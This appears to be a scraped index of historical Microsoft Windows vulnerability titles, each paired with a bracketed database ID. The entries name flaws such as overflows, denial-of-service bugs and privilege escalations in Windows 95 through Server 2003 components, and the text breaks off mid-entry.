Microsoft Windows GDI Kernel Structure Modification Code Execution [30096] Microsoft Windows NAT Helper Components ipnathlp.dll with ICS Malformed DNS Query DoS [29529] Microsoft Windows 2000 creator.dll ActiveX COM Object Memory Corruption [29528] Microsoft Windows 2000 msdxm.ocx ActiveX COM Object Memory Corruption [29527] Microsoft Windows 2000 myinfo.dll ActiveX COM Object Memory Corruption [29526] Microsoft Windows 2000 ciodm.dll ActiveX COM Object Memory Corruption [29439] Microsoft Windows Server Service Crafted SMB Packet Unspecified Issue [29424] Microsoft Windows Object Packager File Extension Dialog Spoofing [29409] Microsoft Windows TCP 135 Crafted Packet Saturation DoS [29351] Microsoft Windows Terminal Services tsuserex.dll COM Object Instantiation [29231] Microsoft Windows Help File Viewer (winhlp32.exe) HLP File Arbitrary Code Execution [29128] Microsoft Windows gdiplus.dll Divide-by-zero DoS [28731] Microsoft Windows Pragmatic General Multicast (PGM) Multicast Message Arbitrary Code Execution [28729] Microsoft Windows Indexing Service Unspecified XSS [28372] Microsoft Windows Explorer URL Passing Recursive file Tag Local DoS [28208] Microsoft Windows Live Messenger Contact List .ctt File Heap Overflow [27848] Microsoft Windows Kernel Unspecified Local Privilege Escalation [27847] Microsoft Windows Unhandled Exception Unspecified Remote Code Execution [27846] Microsoft Windows Winlogon Search Path Subversion Local Privilege Escalation [27845] Microsoft Windows Server Service Crafted RPC Message Remote Overflow [27844] Microsoft Windows DNS Client Service Record Response Overflow [27843] Microsoft Windows Winsock API Hostname Remote Code Execution [27797] Microsoft Windows GDI library (gdi32.dll) createBrushIndirect Function WMF Parsing DoS [27644] Microsoft Windows Server Driver (srv.sys) Crafted SMB Packet NULL Dereference DoS [27155] Microsoft Windows Server Service SRV.SYS Crafted Request SMB Information Disclosure [27154] Microsoft Windows Server Service SRV.SYS First-class Mailslot Message Remote Overflow [27152] Microsoft Windows IIS ASP Page Processing Overflow [27151] Microsoft Windows DHCP Client Service Crafted Response Overflow [26440] Microsoft Windows SMB MrxSmbCscIoctlOpenForCopyChunk Function Overflow [26439] Microsoft Windows SMB MRXSMB.SYS MrxSmbCscIoctlCloseForCopyChunk Remote DoS [26438] Microsoft Windows RPC Mutual Authentication Server Spoofing [26437] Microsoft Windows RRAS RASMAN Remote Overflow [26436] Microsoft Windows RASMAN RPC Request Remote Overflow [26433] Microsoft Windows TCP/IP Protocol Driver Source Routing Overflow [26432] Microsoft Windows jgdw400.dll ART Image Rendering Overflow [26431] Microsoft Windows Graphics Rendering Engine PolyPolygon Function Overflow [26430] Microsoft Windows Media Player PNG Processing Overflow [25949] Microsoft Windows INETCOMM.DLL mhtml: URI Overflow [25761] Microsoft Windows NTDLL.DLL RtlDosPathNameToNtPathName_U API Path Conversion Weakness [25501] Microsoft Windows itss.dll CHM Processing Overflow [25336] Microsoft Windows Distributed Transaction Coordinator (DTC) BuildContextW Request DoS [25335] Microsoft Windows Distributed Transaction Coordinator (DTC) CRpcIoManagerServer::BuildContext Function Remote Overflow [24802] Microsoft Windows Help winhlp32.exe Embedded Image Processing Overflow [24519] Microsoft Outlook Express Windows Address Book (.wab) Processing Overflow [24516] Microsoft Windows Explorer COM Object Handling Remote Code Execution [23136] Microsoft Windows/Office Korean Input Method Editor (IME) ShellAbout() Privilege Escalation [23134] Microsoft Windows Web Client Service Crafted WebDAV Request Overflow [23133] Microsoft Windows IGMPv3 Crafted Packet Remote DoS [23132] Microsoft Windows Media Player Plug-in Malformed EMBED Element Arbitrary Code Execution [23131] Microsoft Windows Media Player Bitmap File Processing Overflow [23047] Microsoft Windows SSDP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23046] Microsoft Windows SCardSvr SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23045] Microsoft Windows NetBT SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [23044] Microsoft Windows UPnP SERVICE_CHANGE_CONFIG Permission Weakness Privilege Escalation [22710] Microsoft Windows Ad-hoc Network Advertisement Weakness [22697] Microsoft Windows Unspecified Display Driver Large Image Processing DoS [22396] Microsoft Windows WMF Processing ExtEscape POSTSCRIPT_INJECTION Function Overflow DoS [22371] Microsoft Windows WMF Processing ExtCreateRegion Function Overflow DoS [21987] Microsoft Windows Shimgvw.dll SETABORTPROC Function Crafted WMF Arbitrary Code Execution [21598] Microsoft Windows 2000 NetBIOS Port Malformed TCP Packet Parsing Remote DoS [21536] Microsoft Windows backup File Name Extension Overflow [21510] Microsoft Windows SynAttackProtect Bypass [20916] Microsoft Windows UPnP GetDeviceList Remote DoS [20875] Microsoft Windows XP Professional Upgrade MSIE Rollback [20580] Microsoft Windows GetEnhMetaFilePaletteEntries() EMF File Rendering DoS [20579] Microsoft Windows GDI Metafile SetPalette Entries Overflow [20497] Microsoft Windows 98SE User32.dll Icon DoS [20367] Microsoft Windows XP Fast User Switching Arbitrary Account Lockout [20366] Microsoft Windows XP Remote Desktop Client Cleartext Account Name Transmission [20364] Microsoft Windows keybd_event Validation Privilege Escalation [20356] Microsoft Windows Win32k.sys ShowWindow Function Local DoS [20279] Microsoft Windows ME ssdpsrv.exe Crafted SSDP Message DoS [20256] Microsoft Windows 2000 NTFS Volume Macintosh Client Directory Permission Modification [20222] Microsoft Windows 2000 runas.exe Named Pipe Spoofing Information Disclosure [20221] Microsoft Windows 2000 runas.exe Named Pipe Single Thread DoS [20220] Microsoft Windows 2000 runas.exe Cleartext Authentication Information Disclosure [20188] Microsoft Windows Crafted SMB SMBnegprots Request DOS [20148] Microsoft Windows smbmount Directory Manipulation Saturation DoS [20028] Microsoft Windows XP SP2 TFTP Local Overflow [20002] Microsoft Windows 2000 CHKDSK Fix Mode File ACL Failure [20001] Microsoft Windows 2000 Terminal Service Client Connection IP Logging Failure [20000] Microsoft Windows 2000 Domain Administrator Computer Lock Bypass [19999] Microsoft Windows 2000 FQDN Domain Login Password Expiry Bypass [19998] Microsoft Windows 2000 UPN Credentialed Login Group Policy Failure [19997] Microsoft Windows 2000 WideCharToMultiByte Function String Termination Issue [19996] Microsoft Windows 2000 Event ID 1704 Group Policy Failure [19995] Microsoft Windows 2000 SECEDIT Long Folder ACL Set Issue [19994] Microsoft Windows 2000 audit directory service access 565 Event Logging Failure [19993] Microsoft Windows 2000 LDAPS CA Trust Issue [19922] Microsoft Windows Client Service for NetWare (CSNW) Remote Overflow [19904] Microsoft Windows DTC Packet Relay DoS [19903] Microsoft Windows DTC Transaction Internet Protocol (TIP) DoS [19902] Microsoft Windows COM+ Remote Code Execution [19901] Microsoft Windows FTP Client Arbitrary File Write [19900] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2122) [19899] Microsoft Windows Shell Crafted .lnk File Arbitrary Code Execution (2005-2118) [19898] Microsoft Windows Web View Arbitrary Script Injection [19873] Microsoft Windows XP Wireless Zero Configuration Credential/Key Disclosure [19857] Microsoft Windows SeDebugPrivilege NtSystemDebugControl Function Privilege Escalation [19775] Microsoft Windows XP ISAKMP UDP Saturation DoS [19764] Microsoft Windows XP Malformed explorer.exe.manifest Local DoS [19287] Microsoft Windows Firewall Malformed Registry Entry Ruleset Exception Weakness [19187] Microsoft Windows NT/2000 DNS Server Non-delegated NS Glue Record Cache Poisoning [19185] Microsoft Windows XP Internet Connection Firewall sessmgr.exe Accss Control Bypass [19007] Microsoft Windows 95 smbclient Triple Dot Traversal Arbitrary Command Execution [19006] Microsoft Windows NT snmp.exe Malformed OID Packet Saturation DoS [18956] Microsoft Windows Registry Editor (Regedt32.exe) Long String Obfuscation [18830] Microsoft Windows UMPNPMGR wsprintfW Remote Overflow [18829] Microsoft Windows Open Type (EOT) Font Handling Remote Overflow [18828] Microsoft Windows Distributed Transaction Coordinator (DTC) Memory Modification Remote Code Execution [18824] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050627) [18823] Microsoft Windows Kernel APC Queue Manipulation Local Privilege Escalation [18821] Microsoft Windows Unspecified Remote Code Execution (EEYEB-20050505) [18820] Microsoft Windows GDI EMF/WMF Metafile Processing Multiple Overflows [18730] Microsoft Windows XP SP1 Raw IP Empty Datagram DoS [18729] Microsoft Windows SNMP LAN Manager (LANMAN) MIB Extension GET/NEXT Request DoS [18728] Microsoft Windows QueryIpMatching Weakness DNS Cache Poisoning [18681] Microsoft Windows XP User Account Manager Hidden User [18624] Microsoft Windows Remote Desktop Protocol (RDP) Crafted Packet Remote DoS [18609] Microsoft Windows Kerberos PKINIT Domain Controller Spoofing [18608] Microsoft Windows Kerberos Crafted Packet Remote DoS [18607] Microsoft Windows Print Spooler Service Remote Overflow [18606] Microsoft Windows Telephony Application Programming Interface (TAPI) Overflow [18605] Microsoft Windows Plug-and-Play Service Remote Overflow [18545] Microsoft Windows NT Cenroll ActiveX (xenroll.dll) File Creation Saturation DoS [18493] Microsoft Windows USB Device Driver Overflow [17885] Microsoft Windows Network Connections Service netman.dll Remote DoS [17860] Microsoft Windows NULL Session MSRPC Interface Remote eventlog Disclosure [17859] Microsoft Windows NULL Session svcctl MSRPC Interface SCM Service Enumeration [17830] Microsoft Windows Color Management Module ICC Profile Format Tag Remote Overflow [17434] Microsoft Windows ASN.1 BERDecBitString Function Overflow [17309] Microsoft Windows Web Client Request Processing Remote Code Execution [17308] Microsoft Windows Server Message Block (SMB) Remote Code Execution [17305] Microsoft Windows HTML Help (CHM) File Overflow [17304] Microsoft Windows Interactive Training .cbo File User Field Overflow [17131] Microsoft Windows Remote Desktop Protocol (RDP) Private Key Disclosure [16494] Microsoft Windows Media Player WMDRM License Acquisition Page Redirection [16430] Microsoft Windows Animated Cursor (ANI) Capability AnimationHeaderBlock Length Field Overflow [15981] Microsoft Windows XP helpctr.exe Crafted URL Command Execution [15739] Microsoft Windows Malformed Image Rendering DoS [15707] Microsoft Windows Explorer Web View Arbitrary Script Insertion [15469] Microsoft Windows MSHTA Shell Application Association Arbitrary Remote Script Execution [15463] Microsoft Windows IP Validation Failure Remote Code Execution [15462] Microsoft Windows CSRSS Local Overflow [15461] Microsoft Windows Object Management Malformed Request DoS [15460] Microsoft Windows Kernel Access Request Local Privilege Escalation [15459] Microsoft Windows Font Processing Local Privilege Escalation [15458] Microsoft Windows Message Queuing Remote Overflow [15379] Microsoft Windows ActiveDirectory LDAP Authentication Bypass [15363] Microsoft Windows Explorer.exe Malformed .wmf Processing DoS [15343] Microsoft Windows Server 2003 Malformed HTTP Cookie Header CGI DoS [15341] Microsoft Windows Server 2003 SMB Redirector Processing DoS [15340] Microsoft Windows Server 2003 Terminal Service Client Print DoS [15339] Microsoft Windows Server Atmf.dll Adobe Font Unloading DoS [15338] Microsoft Windows Server 2003 Terminal Session Close DoS [15337] Microsoft Windows Server 2003 CreateProcessWithLogonW() Function Process Disclosure [15336] Microsoft Windows Server 2003 Shutdown.exe Shut Down Failure [15335] Microsoft Windows Server 2003 MIT Kerberos Realm Authentication Group Policy Failure [15334] Microsoft Windows Server 2003 Shared Folder Permission Weakness [15333] Microsoft Windows Server 2003 EFS File Copy LDAP Connection DoS [15332] Microsoft Windows Server 2003 Citrix Metaframe Encryption Policy Failure [15331] Microsoft Windows Server 2003 Home Folder Path Permission Inheritance Failure [15215] Microsoft Windows SMTP E-mail Malformed Time Stamp DoS [15171] Microsoft Windows XP Search Function Arbitrary XML Injection [15075] Microsoft Windows wab32.dll Malformed .wab File DoS [15011] Microsoft Windows Remote Desktop TSShutdn.exe Unauthenticated Shutdown DoS [14862] Microsoft Windows GDI32.DLL GetEnhMetaFilePaletteEntries() API EMF File DoS [14741] Microsoft Windows XP CommCtl32.dll Shatter Code Execution [14578] Microsoft Windows Malformed TCP SYN Loopback Packet Remote DoS (land) [14475] Microsoft Windows Script Engine for Jscript JsArrayFunctionHeapSort Overflow [14399] Microsoft Windows Media Player .wmf Detection Auto-Run Weakness [14182] Microsoft Windows Drive Restriction Group Policy Bypass [14118] Microsoft Windows Malformed ARP Packet Saturation DoS [13996] Microsoft Windows 2000 IKE Malformed Packet Saturation Remote DoS [13987] Microsoft Windows XP Help Center helpctr.exe Long hcp: URL Overflow [13959] Microsoft Windows Universal Plug and Play (UPnP) Malformed Request DoS [13609] Microsoft Windows Hyperlink Object Library Overflow [13602] Microsoft Windows OLE Input Validation Overflow [13601] Microsoft Windows COM Structured Storage Privilege Escalation [13600] Microsoft Windows SMB Transaction Data Overflow [13599] Microsoft Windows License Logging Service Overflow [13597] Microsoft Windows Media Player PNG File Overflow [13596] Microsoft Windows XP Named Pipe Username Disclosure [13595] Microsoft Windows Sharepoint Services HTML Redirection XSS [13577] Microsoft Windows NetBIOS Remote Host Information Disclosure [13481] Microsoft Windows NT OffloadModExpo CryptographyOffload Registry Key Permission Weakness [13480] Microsoft Windows NT MTS Package Administration Registry Key Permission Weakness [13477] Microsoft Windows Java Applet UDP Socket Exhaustion DoS [13476] Microsoft Windows Media Player asx Parser Multiple Tag Overflow [13475] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution Variant [13474] Microsoft Windows 2000 Telnet Service Predictable Named Pipe Arbitrary Command Execution [13441] Microsoft Windows 2000 Security Interface Change Password Option Account Enumeration [13440] Microsoft Windows XP Hot Keys Screen Lock Bypass [13438] Microsoft Windows CONVERT.EXE FAT32 File Permission Conversion Failure [13437] Microsoft Windows 2000 Debug Register Local Privilege Escalation [13435] Microsoft Windows XP Port 445 Malformed SYN Packet DoS [13434] Microsoft Windows Distributed Transaction Coordinator (DTC) Malformed Input DoS [13424] Microsoft Windows 2000 Current Password Change Policy Bypass [13423] Microsoft Windows 2000 Terminal Server SYSVOL Share Connection Saturation Restriction Bypass [13422] Microsoft Windows PPTP Service Malformed Control Data Overflow [13421] Microsoft Windows XP RDP Malformed PDU Confirm Active Packet DoS [13420] Microsoft Windows NTFS Hard Link Audit Bypass [13419] Microsoft Windows Media Player Active Playlist Arbitrary HTML Script Execution [13416] Microsoft Windows NetDDE Agent WM_COPYDATA Message Arbitrary Code Execution (shatter) [13415] Microsoft Windows 2000 System Root Folder Search Path Permission Weakness [13414] Microsoft Windows RPC Endpoint Manager Malformed Packet Remote DoS [13413] Microsoft Windows XP Windows Shell Function .mp3/.wma Custom Attribute Overflow [13411] Microsoft Windows XP Redirector Function Long Parameter Overflow [13410] Microsoft Windows 2000 Accessibility Utility Manager Arbitrary Code Execution [13409] Microsoft Windows XP EXPLORER.EXE desktop.ini .ShellClassInfo Parameter Overflow [13408] Microsoft Windows SHELL32.DLL ShellExecute API Function Overflow [13389] Microsoft Windows DirectX QUARTZ.DLL Multiple Field .mid File Overflows [13330] Microsoft Windows HKLM Registry Key Locking DoS [13020] Microsoft Windows XP RPC Cache Memory Leak [12842] Microsoft Windows Cursor and Icon Validation Code Execution [12840] Microsoft Windows HTML Help Related Topics Arbitrary Command Execution [12832] Microsoft Windows Indexing Service Query Overflow [12655] Microsoft Windows Active Directory LSASS.EXE DoS [12625] Microsoft Windows winhlp32.exe Overflow [12624] Microsoft Windows Kernel ANI File Parsing DoS [12623] Microsoft Windows LoadImage API Overflow [12511] Microsoft Windows Media Player ActiveX Control setItemInfo() / getItemInfo() Arbitrary WMA File Manipulation [12510] Microsoft Windows Media Player ActiveX Control getItemInfoByAtom() Function File Information Disclosure [12507] Microsoft Windows XP SP2 Popup Blocker Bypass [12482] Microsoft Windows XP Dial-Up Access Firewall Disable [12378] Microsoft Windows WINS Association Context Validation Remote Code Execution [12377] Microsoft Windows NT DHCP Message Length Remote Overflow [12376] Microsoft Windows LSASS Identity Token Validation Local Privilege Escalation [12374] Microsoft Windows HyperTerminal Session File Remote Overflow [12372] Microsoft Windows Kernel Application Launch Local Privilege Escalation [12371] Microsoft Windows NT Malformed DHCP Packet Remote Overflow DoS [12370] Microsoft Windows WINS Computer Name Validation Remote Code Execution [12123] Microsoft Windows ipconfig.exe Overflow [12001] Microsoft Windows XP SP2 File Download Warning Bypass [12000] Microsoft Windows XP SP2 Unspecified Local Zone Access [11999] Microsoft Windows XP SP2 Unspecified Remote File Access [11936] Microsoft Windows shlwapi.dll Malformed HTML Tag Handling Null Pointer DoS [11917] Microsoft Windows XP SP2 Spoofed Content-Location Warning Bypass [11801] Microsoft Windows Small Buffer Length SMB Packet Overflow [11799] Microsoft Windows SMB Signing Group Policy Modification [11797] Microsoft Windows DCOM RPCSS Service DCERPC Packet Overflow [11750] Microsoft Windows 2000 Message Queue Manager Queue Registration Request Overflow DoS [11479] Microsoft Windows NT Double Dot Samba Client DoS [11478] Microsoft Windows NT Malformed SMB Logon Request DoS [11477] Microsoft Windows NT LSASS.EXE Access Violation DoS [11476] Microsoft Windows NT DebugActiveProcess Function Privilege Escalation [11475] Microsoft Windows NT NtOpenProcessToken Permission Failure [11474] Microsoft Windows NT CSRSS Thread Exhaustion DoS [11473] Microsoft Windows NT Messenger Service Long Username DoS [11472] Microsoft Windows NT DNS Server Malformed Response DoS [11471] Microsoft Windows NT DNS Server Character Saturation DoS [11470] Microsoft Windows NT Help File Utility Overflow [11469] Microsoft Windows NT Malformed File Image Header DoS [11468] Microsoft Windows NT IOCTL Function DoS [11463] Microsoft Windows Authenticode ActiveX Install Failure Remote Code Execution [11462] Microsoft Windows HSC PCHealth System HCP URL Query Overflow [11461] Microsoft Windows Workstation Service WKSSVC.DLL Logging Function Remote Overflow [11460] Microsoft Windows RPC DCOM Interface epmapper Pipe Hijack Local Privilege Escalation [11453] Microsoft Windows 98 Malformed oshare Packet DoS [11265] Microsoft Windows NT Malformed RPC Packet Error Message Loop DoS (snork) [11264] Microsoft Windows NT SCM Malformed Resource Enumeration Request DoS [11259] Microsoft Windows NT Domain User Login System Policy Download Failure [11162] Microsoft Windows 95 .pwl File Weak Password Encryption [11161] Microsoft Windows 95 NetWare Remote Administration Hidden File Share [11159] Microsoft Windows NT Invalid RPC Named Pipe Saturation DoS [11158] Microsoft Windows NT Malformed Token Ring DoS [11156] Microsoft Windows NT tcpip.sys Malformed ICMP Request DoS [11096] Microsoft Windows ntconfig.pol Write Failure Access Restriction Bypass [11095] Microsoft Windows NT Ntconfig.pol Long Server Name Access Restriction Bypass [11094] Microsoft Windows NT User Mode Application Handle Closing DoS [11053] Microsoft Windows XP Explorer WAV Parsing DoS [11011] Microsoft Windows NT Netbt.sys Malformed DNS Response DoS [10999] Microsoft Windows Troubleshooter ActiveX Control Tshoot.ocx Arbitrary Code Execution [10997] Microsoft Windows Media Player ActiveX Control Unauthorized Media Library Manipulation [10975] Microsoft Windows NT Winpopup Long Username DoS [10938] Microsoft Windows User32.dll ComboBox CB_DIR Message Local Overflow [10937] Microsoft Windows User32.dll ListBox LB_DIR Message Local Overflow [10936] Microsoft Windows Messenger Service Message Length Remote Overflow [10908] Microsoft Windows XP SP2 ZIP Wizard ZoneID Tracking Failure [10854] Microsoft Windows XP Zip Manager zipfldr.dll Overflow DoS [10699] Microsoft Windows Program Group Converter Arbitrary Code Execution [10698] Microsoft Windows Shell Application Start Arbitrary Code Execution [10697] Microsoft Windows/Exchange NNTP Component Remote Overflow [10696] Microsoft Windows/Exchange SMTP DNS Lookup Overflow [10695] Microsoft Windows Compressed Folders DUNZIP32.DLL File Handling Overflow [10693] Microsoft Windows Unspecified Kernel Local DoS [10692] Microsoft Windows Metafile Image Format Arbitrary Code Execution [10691] Microsoft Windows Virtual DOS Machine Subsystem Local Privilege Escalation [10690] Microsoft Windows Management APIs Local Privilege Escalation [10689] Microsoft Windows NetDDE Remote Overflow [10688] Microsoft Windows WebDAV XML Message Handler Malformed Request DoS [10686] Microsoft Windows NT RPC Library Arbitrary Memory Manipulation [10648] Microsoft Windows NT Default SNMP Registry Key Permission Weakness Local Privilege Escalation [10647] Microsoft Windows CIFS Browser Protocol Arbitrary NetBIOS Cache Entry Modification [10634] Microsoft Windows 95/98 Spoofed ARP Packet Cache Manipulation [10633] Microsoft Windows 2000 Protected Store Weak Encryption Default [10618] Microsoft Windows NT autorun.inf Arbitrary Command Execution [10616] Microsoft Windows NT Fragmented IP Packet Firewall Restriction Bypass [10615] Microsoft Windows NT linux smbmount Request DoS [10614] Microsoft Windows NT %systemroot% Path Inclusion [10609] Microsoft Windows WINS Malformed Packet Consumption DoS [10608] Microsoft Windows TCP/IP Last Sequence Forced RST DoS [10607] Microsoft Windows ICMP Redirect Spoofing DoS [10606] Microsoft Windows LSA NULL Policy Handle DoS [10604] Microsoft Windows NT PATH Working Directory Inclusion [10456] Microsoft Windows IPv6 Packet Fragmentation Handling DoS [10247] Microsoft Windows SMTP Service NTLM Null Session Mail Relay [10230] Microsoft Windows XP SP2 File/Print Share Restriction Bypass [9722] Microsoft Windows NT System Critical Registry Key Contain Bad Value [9579] Microsoft Windows NT GetThreadContext/SetThreadContext Kernel Mode Address DoS [9530] Microsoft Windows CRL File Digital Signature Verification Failure [9386] Microsoft Windows 2000 msinfo32.exe msinfo_file Variable Overflow [9359] Microsoft Windows Page File pagefile.sys Information Disclosure [9358] Microsoft Windows NT Event Log Inappropriate Permissions [9356] Microsoft Windows NT HKEY_CLASSES_ROOT Key Inappropriate System-Critical Permissions [9355] Microsoft Windows NT HKEY_LOCAL_MACHINE Key Inappropriate System-Critical Permissions [9349] Microsoft Windows NT Systems User Audit Policy Logging Weakness [9348] Microsoft Windows NT Non-NTFS File System Insecure [9152] Microsoft Windows XP SP2 Zone Identifier Object Value Warning Failure [9141] Microsoft Windows File Icon Spoofing [9140] Microsoft Windows XP Content-Location Local Computer Zone Bypass [9012] Microsoft Windows XP Internet Connection Firewall Bypass [8368] Microsoft Windows XP/2003 Login Screen Consumption DoS [8334] Microsoft Windows NT \?? Object Folder Symlink Privilege Escalation [8161] Microsoft Windows NT Invalid User Privileges [8160] Microsoft Windows NT File/Directory Invalid Permissions [8112] Microsoft Windows NT Weak Account Password Policy [8051] Microsoft Windows Networking Software Long Filename Handling Arbitrary Command Execution [7904] Microsoft Windows Media Player ActiveX File Existence Disclosure [7891] Microsoft Windows IE window.moveBy Function Pointer Hijack (HijackClickV2) [7855] Microsoft IE on Windows ME Javascript Cookie Set Bypass [7804] Microsoft Windows HTML Help Arbitrary Code Execution [7803] Microsoft Windows showHelp Arbitrary Code Execution [7800] Microsoft Windows POSIX Subsystem Privilege Escalation [7798] Microsoft Windows Task Scheduler Remote Overflow [7777] Microsoft Windows Media Control Preview Script Execution [7738] Microsoft Windows Media Player Skins File Arbitrary Command Execution [7576] Microsoft Windows NT RSHSVC .Rhosts Unauthorized Access [7182] Microsoft Windows Media Unicast Service Severed Connection Memory Leak DoS [7179] Microsoft Windows 2000 Event Viewer Snap-in Overflow [7178] Microsoft Windows Media Player WMP ActiveX Control Javascript Command Execution [7117] Microsoft Windows RPC Locator Remote Overflow [6790] Microsoft Windows NT AEDebug Registry Key Weak Permissions [6515] Microsoft Windows 2000 Domain Expired Account Authentication [6221] Microsoft Windows XP desktop.ini CLSID Arbitrary Command Execution [6074] Microsoft Windows Me HSC hcp:// URL XSS [6053] Microsoft Windows Help and Support Center HCP URL Code Execution [5968] Microsoft Windows ARP Packet DoS [5966] Microsoft Windows NT SMB Traversal Arbitrary File Access [5858] Microsoft Windows NT Rshsvc.exe Arbitrary Command Execution [5687] Microsoft Windows IE and Explorer Share Name Overflow [5686] Microsoft Windows Telnet Service Account Information Disclosure [5558] Microsoft Windows Media Player Advanced Streaming Format Overflow [5313] Microsoft Windows Media Device Manager Invalid Local Storage Device Privilege Escalation [5312] Microsoft Windows Media Player .wma IE Cache Arbitrary Code Execution [5261] Microsoft Windows ASN.1 Double Free Code Execution [5260] Microsoft Windows SSL Library Malformed Message Remote DoS [5259] Microsoft Windows Negotiate SSP Code Execution [5258] Microsoft Windows Virtual DOS Machine Privilege Escalation [5257] Microsoft Windows Local Descriptor Table Privilege Escalation [5256] Microsoft Windows Unspecified H.323 Code Execution [5255] Microsoft Windows Management Privilege Escalation [5254] Microsoft Windows Utility Manager Privilege Escalation [5253] Microsoft Windows Help and Support Center Command Execution [5252] Microsoft Windows Metafile Code Execution [5251] Microsoft Windows Winlogon Command Execution [5250] Microsoft Windows SSL Library Private Communications Transport (PCT) Remote Overflow [5249] Microsoft Windows LDAP Crafted Request Remote DoS [5248] Microsoft Windows LSASS Remote Overflow [5247] Microsoft Windows DCOM RPC Object Identity Information Disclosure [5246] Microsoft Windows CIS/RPC Over HTTP DoS [5245] Microsoft Windows RPCSS Large Length Field DoS [5179] Microsoft Windows 2000 microsoft-ds DoS [4877] Microsoft Windows Terminal Services Kerberos Double Authorization Data Entry [4467] Microsoft Windows WebDav ntdll.dll Remote Overflow [4170] Microsoft Windows 2000 Server Media Services TCP Packet Handling Remote DoS [3903] Microsoft Windows WINS Server Remote Overflow [3902] Microsoft Windows ASN.1 Library Integer Overflow [3711] Microsoft Windows XP Malicious Folder Automatic Code Execution [3111] Microsoft IE Windows Scripting Host (WSH) GetObject Javascript Function Arbitrary File Access [3106] Microsoft Windows Password Authentication Security Point of Failure [3067] Microsoft Windows Media Player ASF File Arbitrary Code Execution [2960] Microsoft Windows Messenger Service Social Engineering Weakness [2705] Microsoft Windows 2000 Windows Troubleshooter ActiveX Overflow [2692] Microsoft Windows Design Tools MDT2DD.DLL COM Object Memory Corruption Command Execution [2678] Microsoft Windows Overflow in ListBox and [2677] Microsoft Windows Arbitrary ActiveX Control Installation [2675] Microsoft Windows HCP protocol Overflow [2670] Microsoft Windows RPC Race Condition DoS [2657] Microsoft Windows Message Queuing Service Heap Overflow [2655] Microsoft Windows Server 2003 Shell Folders Arbitrary File Access [2642] Microsoft Windows Unauthorised Thread Termination [2571] Microsoft Windows TCP Packet URG Value Information Disclosure [2540] Microsoft Windows 2003 Server Buffer Overflow Protection Mechanism Bypass [2535] Microsoft Windows DCOM RPCSS Service Filename Parameter Overflow [2507] Microsoft Windows NetBIOS Random Memory Content Disclosure [2328] Microsoft Windows NT 4.0 with IBM JVM DoS [2262] Microsoft Windows Media Player DHTML Local Zone Access [2247] Microsoft Windows Media Services Remote Command Execution #2 [2244] Microsoft Windows 2000 ShellExecute() API Let [2237] Microsoft Windows 2000 Active Directory Lsass.exe Overflow [2100] Microsoft Windows RPC DCOM Interface Overflow [2074] Microsoft Windows Server Message Block (SMB) Protocol SMB_COM_TRANSACTION Packet Remote Overflow DoS [2073] Microsoft Windows XP Network Share Provider Overflow [2072] Microsoft Windows Network Connection Manager Privilege Elevation [2051] Microsoft Windows User Shell Buffer Overflow [2037] Microsoft Windows Trusted Domain SID Remote Privilege Escalation [1990] Microsoft Windows Terminal Services False IP Address [1975] Microsoft Windows Terminal Server Service RDP Remote DoS [1928] Microsoft Windows NNTP Malformed Post DoS [1915] Microsoft Windows Media Player .NSC File Overflow [1912] Microsoft Windows Terminal Server Malformed RDP DoS [1861] Microsoft Windows Telnet Local System Call DoS [1860] Microsoft Windows Telnet Service Handle Leak DoS [1859] Microsoft Windows Telnet Multiple Sessions DoS [1858] Microsoft Windows Telnet Service Logon Backspace DoS [1840] Microsoft Windows Media Player Internet Shortcut Execution [1764] Microsoft Windows 2000 Domain Controller DoS [1758] Microsoft Windows 2000 Network DDE Escalated Privileges [1755] Microsoft Windows 2000 RDP Malformed Packet Handling Remote DoS [1735] Microsoft Windows NT SNMP WINS Database Deletion Remote DoS [1725] Microsoft Windows Media Player .WMZ Arbitrary Java Applet Execution [1672] Microsoft Windows 2000 Telnet Session Timeout DoS [1658] Microsoft Windows Media Player .ASX File Handling Overflow [1656] Microsoft Windows Media Player .WMS Arbitrary Script Execution [1639] Microsoft Windows NT Terminal Server RegAPI.DLL Username Overflow [1633] Microsoft Windows 2000 System Monitor ActiveX LogFileName Parameter Validation Overflow [1621] Microsoft Indexing Services for Windows 2000 .htw XSS [1607] Microsoft Windows 9x Invalid Driver Type DoS [1599] Microsoft Windows 9x / Me IPX NMPI Packet DoS [1591] Microsoft Windows 2000 OEMPreinstall Installation Permission Weakness [1578] Microsoft Windows 2000 Simplified Chinese IME Local Privilege Escalation [1571] Microsoft Windows Media Player Malformed Embedded OCX Control DoS [1563] Microsoft Windows / Office DLL Search Path Weakness [1546] Microsoft Windows Media Unicast Service Malformed Request DoS [1491] Microsoft Windows 9x IPX Ping Packet DoS [1437] Microsoft Windows 2000 Telnet Server Binary Zero Parsing Remote DoS [1399] Microsoft Windows 2000 Windows Station Access [1358] Microsoft Windows NT HostAnnouncement DoS [1308] Microsoft Windows NetBIOS NULL Source Name DoS [1297] Microsoft Windows 2000 Active Directory Object Attribute [1292] Microsoft Windows NT 4.0 / 2000 cmd.exe Buffer Overflow [1268] Microsoft Windows TCP/IP Printing Service DoS [1257] Microsoft Windows Media License Manager DoS [1251] Microsoft Windows MS DOS Device Name DoS [1226] Microsoft Windows Media Server Malformed Handshake Sequence DoS [1214] Microsoft Windows NT Recycle Bin Deleted File Access [1199] Microsoft Windows NT NtImpersonateClientOfPort LPC Privilege Escalation [1166] Microsoft Windows NT LsaLookupSids() DoS [1161] Microsoft Windows Help System File Manipulation Local Privilege Escalation [1146] Microsoft Windows 9x Credential Cache Cleartext Password Disclosure [1135] Microsoft Windows NT Print Spooler Service (spoolss.exe) AddPrintProvider() Function Alternate Print Provider Arbitrary Command Execution [1134] Microsoft Windows NT Print Spooler Malformed Request Overflow [1095] Microsoft Windows NT RPC Locator (RPCSS.EXE) CPU Utilization DoS [1076] Microsoft Windows IP Source Routing [1075] Microsoft Windows NT RASMAN Path Subversion Privilege Escalation [1046] Microsoft Windows telnet.exe Argument Overflow [1022] Microsoft Windows Invalid IGMP Header Handling Remote DoS [1013] Microsoft Windows NT Screensaver Context Local Privilege Escalation [1010] Microsoft Windows NT Malformed LSA Request DoS [967] Microsoft Windows NT WINS Service Malformed Data DoS [945] Microsoft Windows 95/98 SMB Authentication Replay [943] Microsoft Windows NT SP4 Null NT Hash Value Share Access [931] Microsoft 